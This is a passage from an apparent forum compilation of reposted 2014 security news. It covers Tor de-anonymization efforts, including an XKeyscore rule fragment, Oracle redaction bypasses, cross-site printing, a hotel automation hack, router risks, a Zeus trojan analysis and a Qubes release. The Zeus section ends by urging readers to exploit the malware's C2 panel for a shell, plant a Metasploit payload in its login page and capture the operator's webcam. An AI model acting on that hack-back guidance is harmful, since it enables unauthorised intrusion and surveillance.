sessions”, they discovered numerous exit nodes located in Russia that were used to perform man-in-the-middle attacks. The attackers control the Russian node access to the traffic and re-encrypt it with their own self-signed digital certificate issued to the made-up entity “Main Authority.” It is difficult to attribute the responsibility for these attacks. Researchers speculated the attacks are part of a sophisticated operation conducted to de-anonymize the Tor network. The experts also noticed that when blacklisting the “Main Authority” Tor nodes, new ones using the same certificate would be setup by the same entity. The experts exclude that any government agency was conducting the attack because the technique adopted is too noisy. They suspect that a group of isolating individuals is responsible for the anomalous activity. One of the most noisy choices of the attackers is the use of self-signed certificates that cause a browser warning to Tor users when they visit the bogus website or were victims of MITM attacks. “It was actually done pretty stupidly,” says Winter. The National Security Agency wants to overwhelm Tor Anonymity American Whistleblower Edward Snowden released a collection of classified NSA documents titled ‘Tor Stinks‘, which explain how the NSA agency has developed the capability to de-anonymize a small fraction of Tor users manually. Tor Stinks isn’t an architecture for surveillance on a large-scale, but it allows US agents to track specific individuals during their navigation inside the Tor network. “We will never be able to de-anonymize all Tor users all the time, [but] with manual analysis we can de-anonymize a very small fraction of Tor users,” reports of the slides disclosed. In reality the intelligence agency is doing much more, trying to compromise the entire Tor network and degrading the user experience to dissuade people from using it. Figure – NSA Tor Stinks Project to overwhelm Tor Anonymity The NSA is operating in different ways to reach its goals. Its strategy relies on the following principles to unhinge Tor anonymity. It is running malicious Tor nodes to infiltrate the Tor networks, and at the same time, it is trying to exploit unknown flaws in every component of the anonymizing architecture, on both client and server sides. Slides leaked by Snowden on the Stinks project reveal that the NSA is conducting the following operations: Infiltrate Tor network running its Tor nodes. Both the NSA and GCHQ run Tor nodes to track traffic back to a specific user. The method is based on the circuit reconstruction from the knowledge of the ‘entry, relay and exit’ nodes between the user and the destination website. Exploiting zero-day vulnerability of the Firefox browser bundled with Tor. With this technique, the NSA was able to get the user’s IP address. In this way the FBI arrested the owner of the Freedom Hosting service provider accused of aiding and abetting child pornography. NSA also uses web cookies to track Tor users widely. The technique is effective also for the Tor Browser. The cookies are used to analyze the user’s experience on the Internet. The intelligence agency owned or controlled a series of websites that was able to read last stored cookies from the browser on the victim’s machine. With this technique, the agency collects the user’s data, including the IP address. Of course. expert users can avoid this type of control in numerous ways, for example, using a dedicated browser for exclusive Tor navigation, using only the official preconfigured Tor bundle or properly managing the cookies stored on their machine. Unfortunately, the surveillance methods appeared effective for a huge quantity of individuals. I always suggest to use a virtual machine with a live OS for protecting your Tor anonymity. This way, cache and cookies will be lost once the machine is shut down. Documents leaked by Snowden show that the NSA is using online advertisements i.e. Google Ads to make their tracking sites popular on the Internet. German public broadcaster ARD recently published a report on the use of the XKeyscore platform to compromise Tor anonymity. The media agency reported that two Germany-based Tor Directory Authority servers have been targeted by US intelligence. The broadcaster published for the first time the source code from Xkeyscore, even if ARD didn’t provide information on its origin and how they received it. XKeyscore gives the ‘widest-reaching’ collection of online data, analyzing the content of emails, social media and browsing history. In August 2014, The Guardian published an exclusive report on the NSA surveillance program, providing several NSA training slides from the secret program. Facebook chats and private messages become accessible to the intelligence agents simply providing the Facebook user name and a date range for the investigation. XKeyscore in fact provides instruments necessary for the analysis that are conducted also without any legal authorization or a warrant. “A top secret National Security Agency program allows analysts to search with no prior authorization through vast databases containing emails, online chats and the browsing histories of millions of individuals, according to documents provided by whistleblower Edward Snowden.” The NSA boasts in training materials that the program, called XKeyscore, is its “widest-reaching” system for developing intelligence from the Internet. The source code published by the ARD demonstrates that the NSA tracks people who are believed to live outside the US and who request Tor bridge information via e-mail or who search for or download Tor or the TAILS live operating system. The NSA was able to track their IP addresses. The XKeyScore analyzed by the experts includes IP addresses of the targeted Tor Directory Authority, part of the backbone of the Tor Network. These authorities are updated every hour with information related to new Tor relays. The post also explains that the authors, including the popular expert Jacob Appelbaum, were targeted by the XKeyscore. “Their research in this story is wholly independent from the Tor Project and does not reflect the views of the Tor Project in any way … During the course of the investigation, it was further discovered that an additional computer system run by Jacob Appelbaum for his volunteer work with helping to run part of the Tor network was targeted by the NSA. Moreover, all members of this team are Tor users and appear to be have been targets of the mass surveillance described in the investigation,” ARD stated. Going deep in the source code, it is possible to verify that the NSA is also targeting users of anonymous remailer MixMinion. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12[/TD] [TD=class: code]/** * Placeholder fingerprint for Tor hidden service addresses. * Real fingerpritns will be fired by the plugins * 'anonymizer/tor/plugin/onion/*' */ fingerprint('anonymizer/tor/hiddenservice/address') = nil; // END_DEFINITION // START_DEFINITION appid('anonymizer/mailer/mixminion', 3.0, viewer=$ascii_viewer) = http_host('mixminion') or ip('128.31.0.34'); // END_DEFINITION [/TD] [/TR] [/TABLE] Law enforcement agencies, Tor Network and cybercrime De-Anonymization of the Tor Network users is also a goal for law enforcement agencies that need to track users in order to identify and prevent illicit activities. The FBI last year revealed that experts at the Bureau had compromised the Freedom Hosting company during an investigation of child pornography. Freedom Hosting was probably the most popular Tor hidden service operator company. The FBI exploited a malicious script that takes advantage of a Firefox Zero-day to identify some users of the Tor anonymity network. In an Irish court, the FBI Supervisory Special Agent Brooke Donahue revealed that the FBI had control of the Freedom Hosting company to investigate on child pornography activities. Freedom Hosting was considered by US law enforcement to be the largest child porn facilitator on the planet. For its analysis, the FBI exploited a Firefox Zero-day (MFSA 2013-53) for Firefox 17, also confirmed by Mozilla, that allowed it to track Tor users. It exploited a flaw in the Tor browser to implant a tracking cookie which fingerprinted suspects through a specific external server. “Security researcher Nils reported that specially crafted web content using the onreadystatechange event and reloading of pages could sometimes cause a crash when unmapped memory is executed. This crash is potentially exploitable.” The exploit is based on a JavaScript that is a tiny Windows executable hidden in a variable dubbed “Magneto”. Magneto code looks up the victim’s Windows hostname and MAC address and sends the information back to the FBI Virginia server, exposing the victim’s real IP address. The script sends back the data with a standard HTTP web request outside the Tor Network. Figure – Magneto script used by FBI The investigation caused the identification and the arrest of Eric Eoin Marques, the 28-year-old Irishman owner and operator of Freedom Hosting. Freedom Hosting hosted hundreds of websites, many of them used to conduct illegal activities taking advantage of the anonymity provided by the Tor network. Tor is ordinarily used by cybercriminals to conduct illicit activities like money laundering, exchanging of child porn material, renting for hacking services, and sale of drugs and weapons. Freedom Hosting was offering hosting services to criminal gangs which were moving their business in the Deep Web. Consider that hundreds of hacking sites such as HackBB were hosted by the company. Donahue revealed that the Freedom Hosting service hosted at least 100 child porn sites, providing illegal content to thousands of users, and claimed Marques had visited some of the sites himself. Eric Eoin Marques knew he was being hunted, apparently he sent the earnings to his girlfriend over in Romania. The FBI, analyzing the Marques’s seized computer, discovered that he had made inquiries about how to get a visa and entry into Russia, and residency and citizenship in the country. Marques also made searches for a US passport template and a US passport hologram star. He probably was planning an escape. Court documents and FBI files released under the FOIA have described the CIPAV (Computer and Internet Protocol Address Verifier) as software the FBI can deliver through a browser exploit to gather information from the suspect’s machine and send it to on the server of the Bureau in Virginia. The event is confirmation that the Tor network provides an extra layer of obfuscation, but it must be clear it does not provide bulletproof online anonymity. Many researchers demonstrated that it is possible to de-anonymize users by exploiting a flaw in the protocol itself, or in some of the numerous applications used, like web browser and live distro. Break Tor network anonymity with just $3000 It is a common belief that to de-anonymize the Tor network, it is necessary to make a great effort in term of resources and computational capabilities. Many security experts have started to investigate the possibility that US intelligence and others have found a way to compromise the Tor network. A few weeks ago, two hackers, Alexander Volynkin and Michael McCord, revealed to be able to de-anonymize Tor users easily. They also announced that they will present the results of their study at Black Hat 2014, despite that a few days ago they canceled their participation in the event. “Unfortunately, Mr Volynkin will not be able to speak at the conference since the materials that he would be speaking about have not yet [been] approved by Carnegie Mellon University/Software Engineering Institute for public release,” states the message posted on the official website of the event. Christopher Soghoian, principal technologist with the American Civil Liberties Union, has speculated that the researchers might have feared to be sued by criminal prosecution for illegal monitoring of Tor exit traffic. “Monitoring Tor exit traffic is potentially a violation of several federal criminal statutes,” he added. The expert was preparing a presentation, YOU DON’T HAVE TO BE THE NSA TO BREAK TOR: DEANONYMIZING USERS ON A BUDGET, to explain how to identify Tor users with a very small budget, just $3,000. “There is nothing that prevents you from using your resources to de-anonymize the network’s users instead by exploiting fundamental flaws in Tor design and implementation. And you don’t need the NSA budget to do so. Looking for the IP address of a Tor user? Not a problem. Trying to uncover the location of a Hidden Service? Done. We know because we tested it, in the wild … In this talk, we demonstrate how the distributed nature, combined with newly discovered shortcomings in design and implementation of the Tor network, can be abused to break Tor anonymity,” are the statements used by the two researchers to describe their work. According to the researchers, it is possible to de-anonymize users with a limited budget. The worrying news is that a persistent adversary like an intelligence agency “with a handful of powerful servers and a couple gigabit links can de-anonymize hundreds of thousands of Tor clients and thousands of hidden services within a couple of months.” The discovery made by the researchers, even if it was never publicly disclosed, seems to confirm the fact that the popular anonymizing network is affected by serious flaws that could be exploited by attackers to track users. One of the creators of the Tor project, Roger Dingledine, speaking of the discovery announced by the two researchers, admitted that the Tor Project had been “informally” shown some of the materials that would have been presented by the two researchers. “In response to our questions, we were informally shown some materials. We never received slides or any description of what would be presented in the talk itself beyond what was available on the BlackHat Webpage. “I think I have a handle on what they did, and how to fix it. We’ve been trying to find delicate ways to explain that we think we know what they did, but also it sure would have been smoother if they’d opted to tell us everything. The main reason for trying to be delicate is that I don’t want to discourage future researchers from telling us about neat things that they find. I’m currently waiting for them to answer their mail so I can proceed … Based on our current plans, we’ll be putting out a fix that relays can apply that should close the particular bug they found. The bug is a nice bug, but it isn’t the end of the world,” he added. The Dingledine’ words confirm that there is a flaw in the Tor architecture that the two scientists probably exploited. This means that the software may have been already compromised in the past by Intelligence agencies. Ongoing attacks As we discussed in the previous paragraph, law enforcement, intelligence agencies and individuals are interested in de-anonymizing Tor users for various purposes. Now it’s time to analyze a real ongoing attack, explaining the modus operandi of attackers. On July 30th, the members of the Tor project published on the official website a security advisory to reveal that earlier in the month, on July 4th, 2014, a group of relays was targeted by a cyber attack conducted with the goal to de-anonymize users. The experts on the Tor Project noticed that bad actors were targeting relays to track users accessing Tor networks or access Tor hidden services. “They appear to have been targeting people who operate or access Tor hidden services. The attack involved modifying Tor protocol headers to do traffic confirmation attacks. “The particular confirmation attack they used was an active attack where the relay on one end injects a signal into the Tor protocol headers, and then the relay on the other end reads the signal. These attacking relays were stable enough to get the HSDir (“suitable for hidden service directory”) and Guard (“suitable for being an entry guard”) consensus flags. Then they injected the signal whenever they were used as a hidden service directory, and looked for an injected signal whenever they were used as an entry guard. The technique is simple as efficient. The attack is possible when the attacker controls or observes the relays on both ends of a Tor circuit and then compares traffic timing, volume, or other characteristics to conclude that the two relays are part of the same circuit, which routes information from source to destination. In the case of the first relay in the circuit (“entry guard”), it knows the IP address of the user, and the last relay in the circuit (“exit nodes”) knows the resource or destination the user is accessing. Then the attacker is able to de-anonymize Tor users. Attackers were leveraging a critical flaw in Tor architecture to modify protocol headers in order to perform a traffic confirmation attack and inject a special code into the protocol header used by attackers to compare certain metrics from relays to de-anonymize users. 115 malicious fast non-exit relays (6.4% of the whole Tor network) were involved in the attack. The servers were actively monitoring the relays on both ends of a Tor circuit in an effort to de-anonymize users. The malicious relays were running Tor version 50.7.0.0/16 or 204.45.0.0/16 and bad actors were using them trying to de-anonymize Tor users who visit and run so-called hidden services. The malicious relays joined the Tor network on January 30th, 2014 and experts at Tor Project removed them from the network on July 4th, 2014. The members of the Tor project team also advised hidden service operators to change the location of their hidden service. “While we don’t know when they started doing the attack, users who operated or accessed hidden services from early February through July 4 should assume they were affected,” Tor said. When users access the Tor network with Tor software, their IP address is not visible and it appears to the Internet as the IP address of a Tor exit relay, which can be anywhere. Bad actors who were running the confirmation attack were looking for users who fetched hidden service descriptors. This means that attackers were not able to see pages loaded by users, nor whether users visited the hidden service they looked up. “The attack probably also tried to learn who published hidden service descriptors, which would allow the attackers to learn the location of that hidden service. In theory the attack could also be used to link users to their destinations on normal Tor circuits too, but we found no evidence that the attackers operated any exit relays, making this attack less likely. And finally, we don’t know how much data the attackers kept, and due to the way the attack was deployed (more details below), their protocol header modifications might have aided other attackers in de-anonymizing users too,” states the security advisory. In order to close the critical flaw, the Tor Project Team is suggesting Tor Relay Operators to upgrade Tor software to a recent release, either 0.2.4.23 or 0.2.5.6-alpha. Tor Project released a software update to prevent such attacks. Conclusions Law enforcement agencies and Intelligence are spending a great effort to de-anonymize the user experience on the Tor network, to discourage the use of anonymizing networks. Attackers can follow two directions: Try to break encryption used to anonymize the traffic. Try to exploit flaws in one of the numerous components present in the anonymizing architecture. As demonstrated by recent attacks on anonymizing software like Tails Live Distribution, probably the second choice is the most suitable. The presence of an unknown flaw in one of these components could allow a compromise of the entire architecture. Attackers know this, and they are concentrating all their effort to discover such flaws … but if you are a researcher, do not forget that every day anonymizing networks allow many individuals to avoid censorship and monitoring operated by authoritarian regimes. References http://securityaffairs.co/wordpress/26395/hacking/tor-network-broken.html http://securityaffairs.co/wordpress/26982/hacking/tor-working-fix-flaw.html http://securityaffairs.co/wordpress/27019/hacking/russian-government-crack-tor.html http://www.theregister.co.uk/2014/07/25/putin_crack_tor_for_me_and_ill_make_you_a_millionaire/ http://securityaffairs.co/wordpress/27193/hacking/attacks-against-tor-network.html http://securityaffairs.co/wordpress/5650/cyber-crime/what-is-the-deep-web-a-first-trip-into-the-abyss.html https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack http://www.cs.kau.se/philwint/spoiled_onions/techreport.pdf http://securityaffairs.co/wordpress/18397/hacking/tor-anonymity-tor-stinks.html http://www.bbc.com/news/technology-28573625 http://www.wired.com/2013/09/freedom-hosting-fbi/all/1 http://securityaffairs.co/wordpress/21535/cyber-crime/russia-spying-tor-network-exit-nodes.html http://securityaffairs.co/wordpress/26335/intelligence/xkeyscore-hit-tor-authority-server.html https://blog.torproject.org/blog/one-cell-enough By Pierluigi Paganini|August 6th, 2014 Sursa: Hacking Tor and Online Anonymity - InfoSec Institute

Oracle Database Redaction ‘Trivial to Bypass’ by Dennis Fisher LAS VEGAS–David Litchfield for many years was one of the top bug hunters in the game and specialized in causing large-scale headaches for Oracle. When he decided to retire and go scuba diving, there likely were few tears shed in Redwood City. Litchfield recently decided to resurface, which is good news for the security community and users but may not cause a celebration among Oracle engineers. There were few more proficient vulnerability finders during the 2000s than Litchfield, a self-taught researcher who found dozens and dozens of critical flaws in products up and down the Oracle catalog. While many of his peers focused on browsers and Web servers, Litchfield specialized in digging into the guts of Oracle’s database products and breaking them in new and creative ways. In the days when Oracle touted its security as Unbreakable, Litchfield made a habit of proving otherwise. Recently, he decided to take up the task again. After taking a long break from security research and spending a lot of time in close proximity to great white sharks, Litchfield began looking at Oracle’s security again, specifically a new data redaction service the company added in Oracle 12c. The service is designed to allow administrators to mask sensitive data, such as credit card numbers or health information, during certain operations. But when Litchfield took a close look he found a slew of trivially exploitable vulnerabilities “It’s a great idea. The problem is, of course, it’s trivial to bypass.” “It’s a great idea. The problem is, of course, it’s trivial to bypass,” he said during a talk at the Black Hat USA conference here Wednesday. “If Oracle had followed any sort of SDLC instead of just paying lip service to it, every one of these flaws would’ve been caught. It’s kindergarten stuff.” Litchfield found several methods for bypassing the data redaction service and tricking the system into returning data that should be masked. “The first method uses the RETURNING INTO clause with INSERT, UPDATE and DELETE operations. The RETURNING INTO clause allows data to be returned into a variable after a DML operation. This can be used to bypass Oracle data redaction,” he wrote in a paper outlining the flaws. A second method he found is essentially a brute force attack on the data in a redacted column in a database. “Another way to gain access to the data is with an iterative inference attack. It is possible to access data in a SELECT’s WHERE clause. This gives an attacker the opportunity to essentially guess or brute-force the data in a redacted column using a WHERE data LIKE predicate. Consider the following PL/SQL procedure. This simply tests the value of a given character at a given offset into the string. When it gets the first character correct it moves on to the next character and so on until all 16 characters of the credit card have been ascertained,” he said in the paper. Litchfield said that the methods he found were so simple he doesn’t even feel right calling them exploits. “There are issues that are trivial to find. They’re still not learning he lessons that people were leaning in 2003,” he said. “It’s 2014 and yet I’m still able to sit down and in the space of a few minutes find a bunch of things that I can send to Oracle as exploitable.” The data redaction bypasses that Litchfield found have bee patched, but he said he recently sent Oracle a critical flaw that enables a user gain control of the database. That flaw isn’t patched yet but is in the pipeline. Sursa: Oracle Database Redaction 'Trivial to Bypass' | Threatpost | The first stop for security news

CROSS SITE PRINTING Printer Spamming INTRODUCTION AND BACKGROUND Many network printers listen on port 9100 for a print job (RAW Printing or Direct IP printing). You can telnet directly to the printer port and enter text. Once you disconnect from the printer it will print out the text that you send it. Network printers also accept PostScript, and Printer Control language. The security around this is usually minimal – connect to the port, send the print job, disconnect and the printer prints the page. Within the last year there have been new discoveries on attacking the Intranet from the Internet1. This involves setting an image tag or script tag to an internally addressable IP address and then the browser will request the “image” resource. Several attacks can be accomplished; port scanning, fingerprinting devices, and changing internal router settings. Download: https://sites.google.com/site/aaronweaver2/CrossSitePrinting.pdf?attredirects=0

Hacking Expert 'Took Control Of 200 Hotel Rooms' A security consultant gains control of the lights, blinds and temperature systems of 200 luxury hotel rooms in China. A computer expert took control of 200 luxury hotel rooms after spotting a security flaw in his complimentary in-room iPad. Security consultant Jesus Molina was staying in the five-star St Regis hotel in the Chinese city of Shenzhen, when he said he got bored one evening. He started to play around with the in-room iPad and reverse-engineered an insecure home automation protocol called KNX/IP. By doing so, he was able to control lights, blinds, temperature and other things in his room. He discovered that by changing the last digit of the device's IP address he could take over other devices elsewhere in the hotel. Following that discovery, Mr Molina mapped out the IP addresses for rooms in the rest of the hotel using a computer script he had written. Speaking at the Black Hat hacking conference in Las Vegas, he said: "I thought about looking to see if a similar system controlled the door locks but got scared." After the discovery, he got in touch with the hotel's parent company to highlight the flaw. It is understood that the loophole has now been closed. He told the audience at his talk - called Learn How To Control Every Room At A Luxury Hotel Remotely - that he "did not hack" the system. Instead he said he simply "abused" the KNX protocol, which was created back in the early 90s. Sursa: Hacking Expert 'Took Control Of 200 Hotel Rooms'

Security expert calls home routers a clear and present danger In Black Hat Q&A, In-Q-Tel CISO says home routers are "critical infrastructure." by Sean Gallagher - Aug 7 2014, 4:12am GTBST LAS VEGAS—During his keynote and a press conference that followed here at the Black Hat information security conference, In-Q-Tel Chief Information Security Officer Dan Geer expressed concern about the growing threat of botnets powered by home and small office routers. The inexpensive Wi-Fi routers commonly used for home Internet access—which are rarely patched by their owners—are an easy target for hackers, Geer said, and could be used to construct a botnet that "could probably take down the Internet." Asked by Ars if he considered home routers to be the equivalent of critical infrastructure as a security priority, he answered in the affirmative. Geer spoke about the threat posed by home routers in advance of "SOHOpelessly Broken," a router hacking contest scheduled for the DEF CON security conference later this week sponsored by the Electronic Frontier Foundation. "Because they are so cheap, you can get a low-end router for less than 20 bucks that hasn't been updated in a while," Geer explained. Attackers could identify vulnerabilities in particular models and then scan the Internet for targets based on the routers' signatures. "They can then build botnets on the exterior of the network—the routing that it does is only on side facing ISPs," he said. "If I can build a botnet on the outside of the routers, I could probably take down the Internet." During his keynote, Geer had said that inexpensive routers were an example of the security risk of the "Internet of Things," because of their use of long-lived embedded software with no automatic way for vendors to distribute patches. "All embedded software should either have a remote management interface, orthey need a finite lifetime," he opined, "because if they live long enough, something bad will happen. If a person lives long enough, they will get dementia—if a piece of software lives long enough, it will be taken over." In response to a question during the following press conference, Geer admitted that remote management software for routers was a potential security risk in itself. "But absent that, there's a different set of risks," he added. By using "fuzzing"—sending bogus data to a device to try to cause a failure—Geer said that attackers could essentially discover "an unintended remote management interface. Unless you adopt [interface] strictures, it's very difficult to defend against bad inputs." Sursa: Security expert calls home routers a clear and present danger | Ars Technica

How to bypass Zeus Trojan’s self protection mechanism How to bypass Zeus Trojan’s self protection mechanism Spammers are good when it comes to intimidating users to open the attachment . One of the recent pathetic and cruel one was Hi A Person from your office was found dead outside . Please open the picture to see if you know him . Regards Attachment is basically a Zip file consisting of an exe file named “image.scr” with a nice mspaint icon . Quickly opening up in IDA will give us a hint that it is basically a VBpacker. VBPackers usually create a hallow suspended process , overwrite the memory and resume within . After successfully unpacking and fixing the dump we get the following output OEP the unpacked binary is enough to tell us that it is a Zeus Banking Trojan . Well this one is a different version of Zeus with self-protection which means unpacked ones wont run . This is usually done to “force” the bot masters to buy a Cryptor service . If you double click the binary it will not run , It will simply exit. Now lets see where things are going wrong and how to bypass the protection For that purpose we will generate an API call Graph made by the unpacked binary to see the exit point of program . So from this we got an idea that it is reading file buffer and performing some operations on it and now lets see what operation it is performing on it . Now if we dig deeper we find out the file buffer is read and the some cryptography operations are performed . And if go inside CheckSelfProtection() function we will observe that this function will RC4 the whole binary buffer with a static encryption key and will search for placeholder “DAVE” In my case the RC4 Key was Packer integrity We can copy that 0x200 byte data from the packer into the overlay of our unpacked file. And if found it goes further on verifying the integrity of that data structure and decodes another payload using a 4 byte XOR key taken from that structure. The Total size of the data Structure is 0x200 bytes and on the basis size, Installer and injector are decrypted . Let now understand the structure of that 0x200 Data Structure. During installation phase iSizeOfPacket bytes are copied from the data chunk into heap . And then later on used to decode installer subroutine using XOR cipher . struct Zeus_packer_overlay { DWORD SIGNATURE; SetBackColor( cRed ); DWORD Crc32HASH; SetBackColor( cBlue ); WORD iSizeOfPacket; unsigned int SizeOfDecodedData; unsigned int Unknown1; SetBackColor( cRed ); unsigned int XorKey; }Zeus_Packer_OverLay; Before decoding the installer routine CRC32 hash is checked and SizeOfDecodedData data is copied to heap location in this function. The installer and injector is differentiated by iSizeOfPacket field, if the size is 0x0c then it is still in installation phase if it is 0x1e6 then it has been replaced by installation routine with a new packer data structure . The installation subroutine is then decoded using Xorkey with a data buffer of size SizeOfDecodedData using this simple XOR function. During the installation phase the Packer data structure is rewritten and encrypted using RC4 resulting in data of length 0x1e6 which mainly consists of installation data like 1 : Registry Keys 2 : Random Numbers Generated for Seeding . 3 : Local Path Name 4 : Computer Name and Version Replacing this Packer Overlay data with the old one will let you skip the installation phase and binary wont be relaunched again using CreateProcessA in %appdata%. Yet we will have to patch a jump after it Compares its path in the overlay data with the current path. Owning a Zeus C2C panel / Spammer There exists a publicly known RCE vulnerability in some versions of Zeus ( as well as Zeus lite, KINS,ICE-IX) As described in detail here (Billy (BK) Rios » Turning the Tables – Part I) . Our good friend Xylitol has already provided a ready to use tool to exploit such vulnerability : CyberCrime All we need for that is C2C we address and RC4 communication key . Both of them you can get from Base Config Decoding Subroutine which is again based on simple XOR cipher After getting C2C and RC4 key . It can be submitted here to get a shell on that C2C web panel . Once you get the shell you can then edit the cp.php ( login file for Zeus panel ) and boost up your Metasploit exploit after the bot master has logged in . And if you know how to proceed further and you can get a meterpreter shell on the spammers machine . webcam_snap is one beautiful Meterpreter script command which I personally like ( http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basics#webcam_snap) It takes a webcam capture from the victims computer and saves it in the target machine. And if you enter that , you might get back something like this in your computer Sursa: How to bypass Zeus Trojan’s self protection mechanism

[h=1]Qubes 2 RC2 Is Probably the Most Secure Operating System in Existence – Gallery[/h] August 7th, 2014, 07:17 GMT · By Silviu Stahie Qubes, an open source operating system designed to provide strong security for desktop computing, which is based on Xen, X Window System, and Linux and can run most Linux applications and utilize most of the Linux drivers, is now at version 2 RC2 and it's ready for testing. The Qubes distribution was built as a virtual stronghold and it should be one of the most secure operating systems available right now. It's not a Linux distribution for beginners and it requires users to get informed before using it, but it's all worth it once you understand how it actually works. The Qubes releases don't happen very often. In fact, the previous RC in the series was made available back in April and the development of the new branch actually started in 2013. “Today we're release the second release candidate (rc2) for Qubes OS R2. There are currently no more open tickets for the final R2 release, and we hope that what we release today is stable enough and so will be identical, or nearly identical, to the final R2 ISO, which we plan to release after the summer holidays.” “After Qubes rc1 release a few months ago we have been hit by a number of problems related to unreliable VM start-ups. The most prevalent problem has been traced down to an upstream bug in systemd, which just happened to be manifesting on Qubes OS due to specific conditions imposed by our startup scripts,” note the developers. The devs are also working on a Debian template for Qubes AppVMs, which can be installed with a simple command. It features GUI virtualization, secure clipboard, secure file copy, and other integration features, all of them working out of the box. Also, a “minimal” Fedora-based template can now be found in the Templates Appstore, the Wiki server has been moved to a bigger EC2 instance, and a number of themes for installer and plymouth have been provided by default. Keep in mind that, unlike the rest of Qubes, which is distributed under a GPL v2 license, the Qubes Windows Support Tools are not open sourced and are distributed as binaries only, under a proprietary license. Check out the official announcement for a complete list of updates and upgrade instructions. You can download Qubes 2 RC 2 right now from Softpedia. Remember that this is a development version and it should NOT be installed on production machines. It is intended for testing purposes only. [h=2]QUBES 2 RC2 - PHOTO GALLERY:[/h] [TABLE=class: news_index_hot] [TR] [TD][/TD] [TD][/TD] [TD][/TD] [TD][/TD] [TD][/TD] [/TR] [TR] [TD][/TD] [TD][/TD] [TD][/TD] [TD][/TD] [/TR] [/TABLE] Sursa: Qubes 2 RC2 Is Probably the Most Secure Operating System in Existence – Gallery